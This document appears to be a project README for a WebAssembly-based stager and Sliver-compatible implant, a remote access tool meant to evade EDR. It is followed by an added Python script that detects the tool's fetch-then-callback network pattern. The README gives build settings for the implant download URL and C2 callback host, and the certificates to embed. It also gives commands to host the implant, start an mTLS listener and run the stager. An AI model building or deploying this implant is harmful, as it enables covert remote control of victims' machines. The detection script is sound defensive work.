A stager and Sliver-compatible implant that leverages WebAssembly System Interface (WASI) to create a cross-platform remote access tool. The idea is to bypass EDR by hiding all the functionality within the Wasm runtime.
The toolkit consists of two main components:
- Stager: A WASI runtime that loads and executes the implant module with full system integration
- Implant: A Sliver-compatible Wasm module providing remote shell capabilities and system reconnaissance
The project uses Just as the primary build system for cross-platform automation. All recipes are designed to work on both Windows and Unix systems.
Wasm-stager needs to be configured at build-time with a few things:
- implant-url: HTTP URL that the stager will download the implant from
- sliver-mtls-host: IP of a listening Sliver mTLS server that the implant will connect back to
- sliver-mtls-port: Port of a listening Sliver mTLS server that the implant will connect back to
You can set these with Just like this:
just --set implant-url "http://127.0.0.1:8887/implant.cwasm"
Wasm-stager also needs the certificates for the mTLS connection back to a Sliver server. These are located in /certs/. When you build Sliver, the certificates are baked into the Sliver implant source code. You can find them here:
~/.sliver/certs/
These certs are:
- mtls-server-ca-cert.pem
- mtls-implant-ca-cert.pem
- mtls-implant-ca-key.pem
sudo apt install mingw-w64
Or on Mac:
brew install mingw-w64
# Install Just command runner
cargo install just
# Build
just
# On another machine, or on this one in another terminal
# Host the implant over HTTP
cd bin/release/
python3 -m http.server 8887 &
# Run sliver server mtls listener
./sliver-server
mtls -l 9998
# Run the stager
./bin/release/stager
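The sequence described above (the stager fetches the implant module over HTTP, then the implant connects back to the mTLS listener) leaves two network events that can be correlated. The following is an added detection example, not part of this project's code; the log layouts, sample lines, 120-second window and port allowlist are all assumptions constructed for illustration.

```python
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample telemetry: "time client method url status" and
# "time src dst dport proto". Field layouts are assumptions.
PROXY_LOG = """\
2024-05-01T10:00:01Z 10.0.0.21 GET http://cdn.example.test/app.js 200
2024-05-01T10:02:10Z 10.0.0.37 GET http://198.51.100.7:8887/implant.cwasm 200
2024-05-01T10:05:00Z 10.0.0.44 GET https://tools.example.test/plugin.wasm 200
"""
FLOW_LOG = """\
2024-05-01T10:02:14Z 10.0.0.37 198.51.100.7 9998 tcp
2024-05-01T10:02:30Z 10.0.0.21 203.0.113.5 443 tcp
2024-05-01T11:30:00Z 10.0.0.44 198.51.100.9 9998 tcp
"""

WINDOW = timedelta(seconds=120)       # assumed fetch-to-callback window
COMMON_PORTS = {80, 443}              # assumed allowlist of expected egress ports
MODULE_SUFFIXES = (".cwasm", ".wasm")  # precompiled and plain Wasm modules

def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")

def module_fetches(proxy_log):
    """Yield (time, client, url) for Wasm modules fetched over plain HTTP."""
    for line in proxy_log.splitlines():
        ts, client, method, url, status = line.split()
        parts = urlsplit(url)
        if (method == "GET" and status == "200" and parts.scheme == "http"
                and parts.path.lower().endswith(MODULE_SUFFIXES)):
            yield _ts(ts), client, url

def correlate(proxy_log, flow_log):
    """Pair each module fetch with a later uncommon-port connection from the same host."""
    flows = [line.split() for line in flow_log.splitlines()]
    findings = []
    for fetched_at, client, url in module_fetches(proxy_log):
        for ts, src, dst, port, _proto in flows:
            delay = _ts(ts) - fetched_at
            if (src == client and int(port) not in COMMON_PORTS
                    and timedelta(0) <= delay <= WINDOW):
                findings.append({"host": client, "module_url": url,
                                 "callback": f"{dst}:{port}",
                                 "delay_s": int(delay.total_seconds())})
    return findings

if __name__ == "__main__":
    for finding in correlate(PROXY_LOG, FLOW_LOG):
        print(finding)
```
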